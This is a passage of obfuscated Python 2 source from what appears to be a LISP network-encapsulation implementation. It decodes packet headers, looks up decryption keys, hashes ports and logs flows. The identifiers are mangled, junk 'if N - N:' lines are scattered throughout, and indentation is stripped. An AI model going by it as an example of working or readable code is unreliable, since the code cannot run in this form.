lprint ( "Could not build MAC header, drop IPv6 packet" )
return
if 61 - 61: ooOoO0o / II111iiii * ooOoO0o * OoOoOO00 * I1Ii111 . i11iIiiIii
if 26 - 26: I1Ii111 / ooOoO0o - OoO0O00 . iIii1I11I1II1
IIii1i = mac_header + self . packet
if 83 - 83: ooOoO0o % Ii1I / Oo0Ooo - iII111i / O0
if 97 - 97: iIii1I11I1II1 * I11i
if 95 - 95: OoO0O00
if 68 - 68: iIii1I11I1II1 . iIii1I11I1II1 / OoOoOO00 - II111iiii - iIii1I11I1II1
if 75 - 75: ooOoO0o . I1IiiI * II111iiii
if 99 - 99: iIii1I11I1II1 * I1ii11iIi11i + IiII
if 70 - 70: i1IIi % ooOoO0o . I1ii11iIi11i - IiII + OOooOOo
if 84 - 84: oO0o + II111iiii * II111iiii % o0oOOo0O0Ooo / iII111i + ooOoO0o
if 9 - 9: iII111i
if 25 - 25: OOooOOo - Ii1I . I11i
if 57 - 57: o0oOOo0O0Ooo + Oo0Ooo * I1ii11iIi11i - ooOoO0o % iIii1I11I1II1 - Ii1I
l2_socket . write ( IIii1i )
return
if 37 - 37: OoO0O00 * I11i + Ii1I + I1ii11iIi11i * o0oOOo0O0Ooo
if 95 - 95: Ii1I - i11iIiiIii % i11iIiiIii - O0 * I1Ii111
def bridge_l2_packet ( self , eid , db ) :
try : Oo0O0oOoO0o0 = db . dynamic_eids [ eid . print_address_no_iid ( ) ]
except : return
try : II1i = lisp_myinterfaces [ Oo0O0oOoO0o0 . interface ]
except : return
try :
socket = II1i . get_bridge_socket ( )
if ( socket == None ) : return
except : return
if 21 - 21: I1IiiI - I1IiiI + iII111i % I1IiiI * oO0o
try : socket . send ( self . packet )
except socket . error , oOo :
lprint ( "bridge_l2_packet(): socket.send() failed: {}" . format ( oOo ) )
if 74 - 74: iII111i / I11i . I1IiiI - OoooooooOO + II111iiii + I11i
if 36 - 36: Ii1I * I1IiiI * I1ii11iIi11i . I11i * I1ii11iIi11i
if 76 - 76: OOooOOo + O0 / IiII - OoO0O00
def is_lisp_packet ( self , packet ) :
o0oOo00 = ( struct . unpack ( "B" , packet [ 9 ] ) [ 0 ] == LISP_UDP_PROTOCOL )
if ( o0oOo00 == False ) : return ( False )
if 27 - 27: Oo0Ooo - iIii1I11I1II1 * iII111i * II111iiii * I1ii11iIi11i
IiI1iI1 = struct . unpack ( "H" , packet [ 22 : 24 ] ) [ 0 ]
if ( socket . ntohs ( IiI1iI1 ) == LISP_DATA_PORT ) : return ( True )
IiI1iI1 = struct . unpack ( "H" , packet [ 20 : 22 ] ) [ 0 ]
if ( socket . ntohs ( IiI1iI1 ) == LISP_DATA_PORT ) : return ( True )
return ( False )
if 99 - 99: oO0o / i1IIi
if 2 - 2: oO0o . iII111i
def decode ( self , is_lisp_packet , lisp_ipc_socket , stats ) :
self . packet_error = ""
IIii1i = self . packet
II1II111 = len ( IIii1i )
OoO00oO0o00 = I11 = True
if 51 - 51: iII111i / I11i - I11i
if 65 - 65: OoOoOO00 * O0 - OoOoOO00 - OoO0O00
if 96 - 96: I1ii11iIi11i - O0
if 35 - 35: OOooOOo . I11i . I1Ii111 - I11i % I11i + I1Ii111
oO0oO00 = 0
o0OoO0000o = 0
if ( is_lisp_packet ) :
o0OoO0000o = self . lisp_header . get_instance_id ( )
IiiI1Ii1II = struct . unpack ( "B" , IIii1i [ 0 : 1 ] ) [ 0 ]
self . outer_version = IiiI1Ii1II >> 4
if ( self . outer_version == 4 ) :
if 74 - 74: oO0o / OoooooooOO % oO0o / iIii1I11I1II1 + O0
if 95 - 95: Oo0Ooo * OOooOOo + I1IiiI . O0
if 36 - 36: OoOoOO00 * OoO0O00 / ooOoO0o / I1IiiI - Ii1I
if 53 - 53: oO0o
if 99 - 99: Oo0Ooo
IiIi1I11 = struct . unpack ( "H" , IIii1i [ 10 : 12 ] ) [ 0 ]
IIii1i = lisp_ip_checksum ( IIii1i )
Oo0 = struct . unpack ( "H" , IIii1i [ 10 : 12 ] ) [ 0 ]
if ( Oo0 != 0 ) :
if ( IiIi1I11 != 0 or lisp_is_macos ( ) == False ) :
self . packet_error = "checksum-error"
if ( stats ) :
stats [ self . packet_error ] . increment ( II1II111 )
if 19 - 19: i1IIi / IiII + I1ii11iIi11i * I1ii11iIi11i
if 90 - 90: OoooooooOO * iII111i . i11iIiiIii . ooOoO0o - I1Ii111
lprint ( "IPv4 header checksum failed for outer header" )
if ( lisp_flow_logging ) : self . log_flow ( False )
return ( None )
if 81 - 81: I1IiiI / OoooooooOO
if 52 - 52: oO0o + I1Ii111 * I1Ii111 * Oo0Ooo - iIii1I11I1II1 + I1ii11iIi11i
if 34 - 34: iII111i / OoO0O00 / Oo0Ooo
O000oOOoOOO = LISP_AFI_IPV4
OoO00oo00 = 12
self . outer_tos = struct . unpack ( "B" , IIii1i [ 1 : 2 ] ) [ 0 ]
self . outer_ttl = struct . unpack ( "B" , IIii1i [ 8 : 9 ] ) [ 0 ]
oO0oO00 = 20
elif ( self . outer_version == 6 ) :
O000oOOoOOO = LISP_AFI_IPV6
OoO00oo00 = 8
IiIi = struct . unpack ( "H" , IIii1i [ 0 : 2 ] ) [ 0 ]
self . outer_tos = ( socket . ntohs ( IiIi ) >> 4 ) & 0xff
self . outer_ttl = struct . unpack ( "B" , IIii1i [ 7 : 8 ] ) [ 0 ]
oO0oO00 = 40
else :
self . packet_error = "outer-header-error"
if ( stats ) : stats [ self . packet_error ] . increment ( II1II111 )
lprint ( "Cannot decode outer header" )
return ( None )
if 95 - 95: O0 + iIii1I11I1II1 . I1ii11iIi11i
if 61 - 61: Ii1I * Ii1I
self . outer_source . afi = O000oOOoOOO
self . outer_dest . afi = O000oOOoOOO
O0III1Iiii1i11 = self . outer_source . addr_length ( )
if 74 - 74: Oo0Ooo / I1Ii111 % I1Ii111 . IiII
self . outer_source . unpack_address ( IIii1i [ OoO00oo00 : OoO00oo00 + O0III1Iiii1i11 ] )
OoO00oo00 += O0III1Iiii1i11
self . outer_dest . unpack_address ( IIii1i [ OoO00oo00 : OoO00oo00 + O0III1Iiii1i11 ] )
IIii1i = IIii1i [ oO0oO00 : : ]
self . outer_source . mask_len = self . outer_source . host_mask_len ( )
self . outer_dest . mask_len = self . outer_dest . host_mask_len ( )
if 72 - 72: i1IIi
if 21 - 21: I1Ii111 . OOooOOo / i11iIiiIii * i1IIi
if 82 - 82: ooOoO0o * Oo0Ooo % i11iIiiIii * i1IIi . OOooOOo
if 89 - 89: IiII - i1IIi - IiII
oOOo00OOOO = struct . unpack ( "H" , IIii1i [ 0 : 2 ] ) [ 0 ]
self . udp_sport = socket . ntohs ( oOOo00OOOO )
oOOo00OOOO = struct . unpack ( "H" , IIii1i [ 2 : 4 ] ) [ 0 ]
self . udp_dport = socket . ntohs ( oOOo00OOOO )
oOOo00OOOO = struct . unpack ( "H" , IIii1i [ 4 : 6 ] ) [ 0 ]
self . udp_length = socket . ntohs ( oOOo00OOOO )
oOOo00OOOO = struct . unpack ( "H" , IIii1i [ 6 : 8 ] ) [ 0 ]
self . udp_checksum = socket . ntohs ( oOOo00OOOO )
IIii1i = IIii1i [ 8 : : ]
if 70 - 70: i1IIi - iIii1I11I1II1 - I1Ii111
if 49 - 49: I1Ii111 / II111iiii
if 69 - 69: o0oOOo0O0Ooo + I1ii11iIi11i / iIii1I11I1II1 . IiII % I1ii11iIi11i * OoOoOO00
if 13 - 13: iIii1I11I1II1 + iII111i / Ii1I / i1IIi % OoO0O00 - iIii1I11I1II1
OoO00oO0o00 = ( self . udp_dport == LISP_DATA_PORT or
self . udp_sport == LISP_DATA_PORT )
I11 = ( self . udp_dport in ( LISP_L2_DATA_PORT , LISP_VXLAN_DATA_PORT ) )
if 60 - 60: I1Ii111
if 77 - 77: I1IiiI / I1ii11iIi11i
if 95 - 95: I1Ii111 * i1IIi + oO0o
if 40 - 40: II111iiii
if ( self . lisp_header . decode ( IIii1i ) == False ) :
self . packet_error = "lisp-header-error"
if ( stats ) : stats [ self . packet_error ] . increment ( II1II111 )
if 7 - 7: OOooOOo / OoO0O00
if ( lisp_flow_logging ) : self . log_flow ( False )
lprint ( "Cannot decode LISP header" )
return ( None )
if 88 - 88: i1IIi
IIii1i = IIii1i [ 8 : : ]
o0OoO0000o = self . lisp_header . get_instance_id ( )
oO0oO00 += 16
if 53 - 53: ooOoO0o . OOooOOo . o0oOOo0O0Ooo + oO0o
if ( o0OoO0000o == 0xffffff ) : o0OoO0000o = 0
if 17 - 17: iIii1I11I1II1 + i1IIi . I1ii11iIi11i + Ii1I % i1IIi . oO0o
if 57 - 57: oO0o
if 92 - 92: II111iiii - OoO0O00 - OOooOOo % I1IiiI - OoOoOO00 * I1Ii111
if 16 - 16: iIii1I11I1II1 + OoooooooOO - ooOoO0o * IiII
iiI1IiI1I1I = False
IIIiI1i = self . lisp_header . k_bits
if ( IIIiI1i ) :
oo0o00OO = lisp_get_crypto_decap_lookup_key ( self . outer_source ,
self . udp_sport )
if ( oo0o00OO == None ) :
self . packet_error = "no-decrypt-key"
if ( stats ) : stats [ self . packet_error ] . increment ( II1II111 )
if 22 - 22: IiII / OOooOOo
self . print_packet ( "Receive" , is_lisp_packet )
O0OOoooO = bold ( "No key available" , False )
dprint ( "{} for key-id {} to decrypt packet" . format ( O0OOoooO , IIIiI1i ) )
if ( lisp_flow_logging ) : self . log_flow ( False )
return ( None )
if 31 - 31: oO0o % i1IIi . OoooooooOO - o0oOOo0O0Ooo + OoooooooOO
if 45 - 45: OOooOOo + I11i / OoooooooOO - Ii1I + OoooooooOO
ii1i1I1111ii = lisp_crypto_keys_by_rloc_decap [ oo0o00OO ] [ IIIiI1i ]
if ( ii1i1I1111ii == None ) :
self . packet_error = "no-decrypt-key"
if ( stats ) : stats [ self . packet_error ] . increment ( II1II111 )
if 87 - 87: IiII
self . print_packet ( "Receive" , is_lisp_packet )
O0OOoooO = bold ( "No key available" , False )
dprint ( "{} to decrypt packet from RLOC {}" . format ( O0OOoooO ,
red ( oo0o00OO , False ) ) )
if ( lisp_flow_logging ) : self . log_flow ( False )
return ( None )
if 32 - 32: OoooooooOO / iII111i / I1Ii111 + iII111i - I11i + II111iiii
if 11 - 11: OoooooooOO * o0oOOo0O0Ooo + OoooooooOO - I1ii11iIi11i
if 47 - 47: I1Ii111 % OOooOOo * OoO0O00 . iIii1I11I1II1 % Oo0Ooo + OoooooooOO
if 2 - 2: I1Ii111 % OoooooooOO - ooOoO0o * I1ii11iIi11i * IiII
if 99 - 99: iIii1I11I1II1 . Oo0Ooo / ooOoO0o . OOooOOo % I1IiiI * I11i
ii1i1I1111ii . use_count += 1
IIii1i , iiI1IiI1I1I = self . decrypt ( IIii1i , oO0oO00 , ii1i1I1111ii ,
oo0o00OO )
if ( iiI1IiI1I1I == False ) :
if ( stats ) : stats [ self . packet_error ] . increment ( II1II111 )
if ( lisp_flow_logging ) : self . log_flow ( False )
return ( None )
if 95 - 95: oO0o
if 80 - 80: IiII
if 42 - 42: OoooooooOO * II111iiii
if 53 - 53: I1Ii111 + i1IIi . OoO0O00 / i11iIiiIii + Ii1I % OoOoOO00
if 9 - 9: ooOoO0o . I11i - Oo0Ooo . I1Ii111
if 39 - 39: OOooOOo
IiiI1Ii1II = struct . unpack ( "B" , IIii1i [ 0 : 1 ] ) [ 0 ]
self . inner_version = IiiI1Ii1II >> 4
if ( OoO00oO0o00 and self . inner_version == 4 and IiiI1Ii1II >= 0x45 ) :
o00OO00OOo0 = socket . ntohs ( struct . unpack ( "H" , IIii1i [ 2 : 4 ] ) [ 0 ] )
self . inner_tos = struct . unpack ( "B" , IIii1i [ 1 : 2 ] ) [ 0 ]
self . inner_ttl = struct . unpack ( "B" , IIii1i [ 8 : 9 ] ) [ 0 ]
self . inner_protocol = struct . unpack ( "B" , IIii1i [ 9 : 10 ] ) [ 0 ]
self . inner_source . afi = LISP_AFI_IPV4
self . inner_dest . afi = LISP_AFI_IPV4
self . inner_source . unpack_address ( IIii1i [ 12 : 16 ] )
self . inner_dest . unpack_address ( IIii1i [ 16 : 20 ] )
iIiIi1i1Iiii = socket . ntohs ( struct . unpack ( "H" , IIii1i [ 6 : 8 ] ) [ 0 ] )
self . inner_is_fragment = ( iIiIi1i1Iiii & 0x2000 or iIiIi1i1Iiii != 0 )
if ( self . inner_protocol == LISP_UDP_PROTOCOL ) :
self . inner_sport = struct . unpack ( "H" , IIii1i [ 20 : 22 ] ) [ 0 ]
self . inner_sport = socket . ntohs ( self . inner_sport )
self . inner_dport = struct . unpack ( "H" , IIii1i [ 22 : 24 ] ) [ 0 ]
self . inner_dport = socket . ntohs ( self . inner_dport )
if 92 - 92: OOooOOo
elif ( OoO00oO0o00 and self . inner_version == 6 and IiiI1Ii1II >= 0x60 ) :
o00OO00OOo0 = socket . ntohs ( struct . unpack ( "H" , IIii1i [ 4 : 6 ] ) [ 0 ] ) + 40
IiIi = struct . unpack ( "H" , IIii1i [ 0 : 2 ] ) [ 0 ]
self . inner_tos = ( socket . ntohs ( IiIi ) >> 4 ) & 0xff
self . inner_ttl = struct . unpack ( "B" , IIii1i [ 7 : 8 ] ) [ 0 ]
self . inner_protocol = struct . unpack ( "B" , IIii1i [ 6 : 7 ] ) [ 0 ]
self . inner_source . afi = LISP_AFI_IPV6
self . inner_dest . afi = LISP_AFI_IPV6
self . inner_source . unpack_address ( IIii1i [ 8 : 24 ] )
self . inner_dest . unpack_address ( IIii1i [ 24 : 40 ] )
if ( self . inner_protocol == LISP_UDP_PROTOCOL ) :
self . inner_sport = struct . unpack ( "H" , IIii1i [ 40 : 42 ] ) [ 0 ]
self . inner_sport = socket . ntohs ( self . inner_sport )
self . inner_dport = struct . unpack ( "H" , IIii1i [ 42 : 44 ] ) [ 0 ]
self . inner_dport = socket . ntohs ( self . inner_dport )
if 32 - 32: iII111i . iIii1I11I1II1 % Oo0Ooo . OoooooooOO
elif ( I11 ) :
o00OO00OOo0 = len ( IIii1i )
self . inner_tos = 0
self . inner_ttl = 0
self . inner_protocol = 0
self . inner_source . afi = LISP_AFI_MAC
self . inner_dest . afi = LISP_AFI_MAC
self . inner_dest . unpack_address ( self . swap_mac ( IIii1i [ 0 : 6 ] ) )
self . inner_source . unpack_address ( self . swap_mac ( IIii1i [ 6 : 12 ] ) )
elif ( self . lisp_header . get_instance_id ( ) == 0xffffff ) :
if ( lisp_flow_logging ) : self . log_flow ( False )
return ( self )
else :
self . packet_error = "bad-inner-version"
if ( stats ) : stats [ self . packet_error ] . increment ( II1II111 )
if 81 - 81: i11iIiiIii * iII111i . oO0o * oO0o . IiII
lprint ( "Cannot decode encapsulation, header version {}" . format ( hex ( IiiI1Ii1II ) ) )
if 47 - 47: iIii1I11I1II1 % I11i . I11i / O0 . i11iIiiIii * Ii1I
IIii1i = lisp_format_packet ( IIii1i [ 0 : 20 ] )
lprint ( "Packet header: {}" . format ( IIii1i ) )
if ( lisp_flow_logging and is_lisp_packet ) : self . log_flow ( False )
return ( None )
if 24 - 24: O0
self . inner_source . mask_len = self . inner_source . host_mask_len ( )
self . inner_dest . mask_len = self . inner_dest . host_mask_len ( )
self . inner_source . instance_id = o0OoO0000o
self . inner_dest . instance_id = o0OoO0000o
if 33 - 33: OoooooooOO + oO0o * II111iiii / OOooOOo
if 87 - 87: OoooooooOO
if 1 - 1: iIii1I11I1II1 / o0oOOo0O0Ooo
if 98 - 98: O0 % I1IiiI / OoooooooOO * I1ii11iIi11i - oO0o
if 51 - 51: iII111i + I11i
if ( lisp_nonce_echoing and is_lisp_packet ) :
Oo0ooO0O0o00o = lisp_get_echo_nonce ( self . outer_source , None )
if ( Oo0ooO0O0o00o == None ) :
o0O00oo0O = self . outer_source . print_address_no_iid ( )
Oo0ooO0O0o00o = lisp_echo_nonce ( o0O00oo0O )
if 75 - 75: Ii1I + ooOoO0o / OoooooooOO
oOO000 = self . lisp_header . get_nonce ( )
if ( self . lisp_header . is_e_bit_set ( ) ) :
Oo0ooO0O0o00o . receive_request ( lisp_ipc_socket , oOO000 )
elif ( Oo0ooO0O0o00o . request_nonce_sent ) :
Oo0ooO0O0o00o . receive_echo ( lisp_ipc_socket , oOO000 )
if 47 - 47: iIii1I11I1II1 + OoO0O00 % iIii1I11I1II1 . ooOoO0o / Oo0Ooo - i11iIiiIii
if 80 - 80: I1ii11iIi11i / O0 / iIii1I11I1II1 + I1IiiI
if 3 - 3: ooOoO0o / i1IIi - OoOoOO00
if 73 - 73: OoooooooOO * O0 * ooOoO0o
if 7 - 7: II111iiii + i1IIi
if 95 - 95: i11iIiiIii + OoooooooOO / OOooOOo - iIii1I11I1II1 + iIii1I11I1II1
if 29 - 29: IiII % ooOoO0o + OoO0O00 . i1IIi + I1IiiI
if ( iiI1IiI1I1I ) : self . packet += IIii1i [ : o00OO00OOo0 ]
if 24 - 24: I1Ii111 / Ii1I * I1ii11iIi11i - OoooooooOO / I1IiiI . oO0o
if 98 - 98: i1IIi - iII111i
if 49 - 49: o0oOOo0O0Ooo . Ii1I . oO0o
if 9 - 9: IiII - II111iiii * OoO0O00
if ( lisp_flow_logging and is_lisp_packet ) : self . log_flow ( False )
return ( self )
if 78 - 78: iIii1I11I1II1 / O0 * oO0o / iII111i / OoOoOO00
if 15 - 15: ooOoO0o / oO0o
def swap_mac ( self , mac ) :
return ( mac [ 1 ] + mac [ 0 ] + mac [ 3 ] + mac [ 2 ] + mac [ 5 ] + mac [ 4 ] )
if 54 - 54: ooOoO0o - iIii1I11I1II1 - I11i % Ii1I / II111iiii
if 80 - 80: i11iIiiIii % iIii1I11I1II1 / i11iIiiIii
def strip_outer_headers ( self ) :
OoO00oo00 = 16
OoO00oo00 += 20 if ( self . outer_version == 4 ) else 40
self . packet = self . packet [ OoO00oo00 : : ]
return ( self )
if 66 - 66: OoOoOO00 . iIii1I11I1II1 * I1ii11iIi11i - Ii1I - iIii1I11I1II1
if 28 - 28: OoOoOO00 % OoooooooOO
def hash_ports ( self ) :
IIii1i = self . packet
IiiI1Ii1II = self . inner_version
I1I = 0
if ( IiiI1Ii1II == 4 ) :
iIIIIi1iiI = struct . unpack ( "B" , IIii1i [ 9 ] ) [ 0 ]
if ( self . inner_is_fragment ) : return ( iIIIIi1iiI )
if ( iIIIIi1iiI in [ 6 , 17 ] ) :
I1I = iIIIIi1iiI
I1I += struct . unpack ( "I" , IIii1i [ 20 : 24 ] ) [ 0 ]
I1I = ( I1I >> 16 ) ^ ( I1I & 0xffff )
if 57 - 57: I11i . O0 . OoooooooOO . I1Ii111 - Ii1I / ooOoO0o
if 34 - 34: OoOoOO00 % o0oOOo0O0Ooo - oO0o
if ( IiiI1Ii1II == 6 ) :
iIIIIi1iiI = struct . unpack ( "B" , IIii1i [ 6 ] ) [ 0 ]
if ( iIIIIi1iiI in [ 6 , 17 ] ) :
I1I = iIIIIi1iiI
I1I += struct . unpack ( "I" , IIii1i [ 40 : 44 ] ) [ 0 ]
I1I = ( I1I >> 16 ) ^ ( I1I & 0xffff )
if 40 - 40: iII111i
if 82 - 82: I1Ii111 . i1IIi / oO0o
return ( I1I )
if 56 - 56: iII111i
if 23 - 23: i1IIi
def hash_packet ( self ) :
I1I = self . inner_source . address ^ self . inner_dest . address
I1I += self . hash_ports ( )
if ( self . inner_version == 4 ) :
I1I = ( I1I >> 16 ) ^ ( I1I & 0xffff )
elif ( self . inner_version == 6 ) :
I1I = ( I1I >> 64 ) ^ ( I1I & 0xffffffffffffffff )
I1I = ( I1I >> 32 ) ^ ( I1I & 0xffffffff )
I1I = ( I1I >> 16 ) ^ ( I1I & 0xffff )
if 24 - 24: IiII
self . udp_sport = 0xf000 | ( I1I & 0xfff )
if 51 - 51: OOooOOo % i11iIiiIii
if 77 - 77: OOooOOo % i11iIiiIii - I1ii11iIi11i
def print_packet ( self , s_or_r , is_lisp_packet ) :
if ( is_lisp_packet == False ) :
I1 = "{} -> {}" . format ( self . inner_source . print_address ( ) ,
self . inner_dest . print_address ( ) )
dprint ( ( "{} {}, tos/ttl: {}/{}, length: {}, packet: {} ..." ) . format ( bold ( s_or_r , False ) ,
# IiII + i1IIi . I1Ii111 - I11i
green ( I1 , False ) , self . inner_tos ,
self . inner_ttl , len ( self . packet ) ,
lisp_format_packet ( self . packet [ 0 : 60 ] ) ) )
return
if 29 - 29: OoooooooOO - oO0o / I1IiiI + II111iiii
if 12 - 12: oO0o . OOooOOo
if ( s_or_r . find ( "Receive" ) != - 1 ) :
oo00 = "decap"
oo00 += "-vxlan" if self . udp_dport == LISP_VXLAN_DATA_PORT else ""
else :
oo00 = s_or_r
if ( oo00 in [ "Send" , "Replicate" ] or oo00 . find ( "Fragment" ) != - 1 ) :
oo00 = "encap"
if 88 - 88: I11i - iII111i
if 68 - 68: Oo0Ooo % oO0o . IiII - o0oOOo0O0Ooo / i1IIi / OoooooooOO
i1II11II11 = "{} -> {}" . format ( self . outer_source . print_address_no_iid ( ) ,
self . outer_dest . print_address_no_iid ( ) )
if 94 - 94: iIii1I11I1II1
if 1 - 1: O0
if 2 - 2: OoO0O00 . I11i
if 97 - 97: Oo0Ooo
if 65 - 65: Oo0Ooo % OOooOOo / i11iIiiIii / iIii1I11I1II1 . I1Ii111 + ooOoO0o
if ( self . lisp_header . get_instance_id ( ) == 0xffffff ) :
oOOo0ooO0 = ( "{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + "{}/{}, outer UDP: {} -> {}, " )
if 92 - 92: oO0o
oOOo0ooO0 += bold ( "control-packet" , False ) + ": {} ..."
if 96 - 96: I1Ii111 * iIii1I11I1II1 / OoOoOO00 % OOooOOo * II111iiii
dprint ( oOOo0ooO0 . format ( bold ( s_or_r , False ) , red ( i1II11II11 , False ) ,
self . outer_tos , self . outer_ttl , self . udp_sport ,
self . udp_dport , lisp_format_packet ( self . packet [ 0 : 56 ] ) ) )
return
else :
oOOo0ooO0 = ( "{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + "{}/{}, outer UDP: {} -> {}, inner EIDs: {}, " + "inner tos/ttl: {}/{}, length: {}, {}, packet: {} ..." )
if 3 - 3: OOooOOo . Oo0Ooo / i11iIiiIii + OoO0O00
if 47 - 47: IiII . OOooOOo
if 96 - 96: I11i % II111iiii / ooOoO0o % OOooOOo / ooOoO0o % i11iIiiIii
if 57 - 57: I11i - I11i % II111iiii % Oo0Ooo . o0oOOo0O0Ooo % Oo0Ooo
if ( self . lisp_header . k_bits ) :
if ( oo00 == "encap" ) : oo00 = "encrypt/encap"
if ( oo00 == "decap" ) : oo00 = "decap/decrypt"
if 91 - 91: I1IiiI - OoO0O00 - Oo0Ooo - Ii1I * iIii1I11I1II1
if 68 - 68: OoO0O00 % O0 * iIii1I11I1II1 / oO0o * o0oOOo0O0Ooo + OOooOOo
I1 = "{} -> {}" . format ( self . inner_source . print_address ( ) ,
self . inner_dest . print_address ( ) )
if 89 - 89: ooOoO0o * I1IiiI . oO0o
dprint ( oOOo0ooO0 . format ( bold ( s_or_r , False ) , red ( i1II11II11 , False ) ,
self . outer_tos , self . outer_ttl , self . udp_sport , self . udp_dport ,
green ( I1 , False ) , self . inner_tos , self . inner_ttl ,
len ( self . packet ) , self . lisp_header . print_header ( oo00 ) ,
lisp_format_packet ( self . packet [ 0 : 56 ] ) ) )
if 75 - 75: ooOoO0o - iII111i % iII111i + ooOoO0o * o0oOOo0O0Ooo - I1ii11iIi11i
if 26 - 26: I11i * Ii1I % I1IiiI + iII111i
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . inner_source , self . inner_dest ) )
if 38 - 38: iII111i - Oo0Ooo / Ii1I + oO0o . iII111i + IiII
if 19 - 19: Ii1I
def get_raw_socket ( self ) :
o0OoO0000o = str ( self . lisp_header . get_instance_id ( ) )
if ( o0OoO0000o == "0" ) : return ( None )
if ( lisp_iid_to_interface . has_key ( o0OoO0000o ) == False ) : return ( None )
if 51 - 51: iIii1I11I1II1
II1i = lisp_iid_to_interface [ o0OoO0000o ]
IiII1iiI = II1i . get_socket ( )
if ( IiII1iiI == None ) :
iI = bold ( "SO_BINDTODEVICE" , False )
II1I = ( os . getenv ( "LISP_ENFORCE_BINDTODEVICE" ) != None )
lprint ( "{} required for multi-tenancy support, {} packet" . format ( iI , "drop" if II1I else "forward" ) )
if 10 - 10: i11iIiiIii . OoooooooOO . O0 % ooOoO0o / OoO0O00
if ( II1I ) : return ( None )
if 36 - 36: I1IiiI % i1IIi + OoO0O00
if 59 - 59: i11iIiiIii - i11iIiiIii + I1IiiI
o0OoO0000o = bold ( o0OoO0000o , False )
OooOOOoOoo0O0 = bold ( II1i . device , False )
dprint ( "Send packet on instance-id {} interface {}" . format ( o0OoO0000o , OooOOOoOoo0O0 ) )
return ( IiII1iiI )
if 4 - 4: Oo0Ooo * O0 - oO0o % ooOoO0o + OoOoOO00
if 3 - 3: OoOoOO00
def log_flow ( self , encap ) :
global lisp_flow_log
if 91 - 91: O0 - I11i % I1Ii111
I1ii = os . path . exists ( "./log-flows" )
if ( len ( lisp_flow_log ) == LISP_FLOW_LOG_SIZE or I1ii ) :
OOoo = [ lisp_flow_log ]
lisp_flow_log = [ ]
threading . Thread ( target = lisp_write_flow_log , args = OOoo ) . start ( )
if ( I1ii ) : os . system ( "rm ./log-flows" )
return
if 87 - 87: OoO0O00 * OoOoOO00 - Oo0Ooo % OOooOOo * i11iIiiIii
if 59 - 59: I1Ii111 + OoooooooOO / I1IiiI / OoooooooOO . iII111i
Oo0OO0000oooo = datetime . datetime . now ( )
lisp_flow_log . append ( [ Oo0OO0000oooo , encap , self . packet , self ] )
if 20 - 20: Ii1I . I1Ii111 % Ii1I
if 5 - 5: OOooOOo + iII111i
def print_flow ( self , ts , encap , packet ) :
ts = ts . strftime ( "%m/%d/%y %H:%M:%S.%f" ) [ : - 3 ]
i1ii11III1 = "{}: {}" . format ( ts , "encap" if encap else "decap" )
if 3 - 3: oO0o % OoOoOO00 . I1ii11iIi11i / OoO0O00
iII111iiIII1I = red ( self . outer_source . print_address_no_iid ( ) , False )
iiIIiii1ii1 = red ( self . outer_dest . print_address_no_iid ( ) , False )
Ii1i111iI = green ( self . inner_source . print_address ( ) , False )
iII1ii = green ( self . inner_dest . print_address ( ) , False )
if 51 - 51: o0oOOo0O0Ooo . I1ii11iIi11i * Ii1I / Oo0Ooo * II111iiii / O0
if ( self . lisp_header . get_instance_id ( ) == 0xffffff ) :
i1ii11III1 += " {}:{} -> {}:{}, LISP control message type {}\n"
i1ii11III1 = i1ii11III1 . format ( iII111iiIII1I , self . udp_sport , iiIIiii1ii1 , self . udp_dport ,
self . inner_version )
return ( i1ii11III1 )
if 44 - 44: i11iIiiIii % I1Ii111 % oO0o + I11i * oO0o . Ii1I
if 89 - 89: OoooooooOO % II111iiii - OoO0O00 % i11iIiiIii
if ( self . outer_dest . is_null ( ) == False ) :
i1ii11III1 += " {}:{} -> {}:{}, len/tos/ttl {}/{}/{}"
i1ii11III1 = i1ii11III1 . format ( iII111iiIII1I , self . udp_sport , iiIIiii1ii1 , self . udp_dport ,
len ( packet ) , self . outer_tos , self . outer_ttl )
if 7 - 7: IiII
if 15 - 15: Oo0Ooo + iII111i + I1IiiI * o0oOOo0O0Ooo
if 33 - 33: o0oOOo0O0Ooo * Oo0Ooo
if 88 - 88: I1Ii111 % OOooOOo - OoOoOO00 - OoOoOO00 . I1IiiI
if 52 - 52: II111iiii / II111iiii / I1IiiI - I1Ii111
if ( self . lisp_header . k_bits != 0 ) :
Oo0OOo = "\n"
if ( self . packet_error != "" ) :
Oo0OOo = " ({})" . format ( self . packet_error ) + Oo0OOo
if 43 - 43: IiII % Ii1I . OOooOOo / Oo0Ooo
i1ii11III1 += ", encrypted" + Oo0OOo
return ( i1ii11III1 )
if 55 - 55: I1ii11iIi11i % OoooooooOO
if 73 - 73: i1IIi - iII111i % oO0o / i1IIi + II111iiii + I1ii11iIi11i
if 54 - 54: oO0o
if 26 - 26: ooOoO0o % OoooooooOO . I1Ii111 * ooOoO0o + II111iiii - I1ii11iIi11i
if 20 - 20: OoO0O00
if ( self . outer_dest . is_null ( ) == False ) :
packet = packet [ 36 : : ] if self . outer_version == 4 else packet [ 56 : : ]
if 99 - 99: Oo0Ooo + OoooooooOO . iII111i + O0
if 85 - 85: II111iiii - Ii1I
iIIIIi1iiI = packet [ 9 ] if self . inner_version == 4 else packet [ 6 ]
iIIIIi1iiI = struct . unpack ( "B" , iIIIIi1iiI ) [ 0 ]
if 93 - 93: IiII / i11iIiiIii - oO0o + OoO0O00 / i1IIi
i1ii11III1 += " {} -> {}, len/tos/ttl/prot {}/{}/{}/{}"
i1ii11III1 = i1ii11III1 . format ( Ii1i111iI , iII1ii , len ( packet ) , self . inner_tos ,
self . inner_ttl , iIIIIi1iiI )
if 62 - 62: I1ii11iIi11i / OoooooooOO * I1IiiI - i1IIi
if 81 - 81: oO0o / O0 * ooOoO0o % OoOoOO00 / O0
if 85 - 85: OoooooooOO + OoooooooOO
if 23 - 23: i1IIi
if ( iIIIIi1iiI in [ 6 , 17 ] ) :
IIiii1I1I = packet [ 20 : 24 ] if self . inner_version == 4 else packet [ 40 : 44 ]
if ( len ( IIiii1I1I ) == 4 ) :
IIiii1I1I = socket . ntohl ( struct . unpack ( "I" , IIiii1I1I ) [ 0 ] )
i1ii11III1 += ", ports {} -> {}" . format ( IIiii1I1I >> 16 , IIiii1I1I & 0xffff )
if 62 - 62: II111iiii - OoOoOO00 * Ii1I
elif ( iIIIIi1iiI == 1 ) :
oO0OO0O = packet [ 26 : 28 ] if self . inner_version == 4 else packet [ 46 : 48 ]
if ( len ( oO0OO0O ) == 2 ) :
oO0OO0O = socket . ntohs ( struct . unpack ( "H" , oO0OO0O ) [ 0 ] )
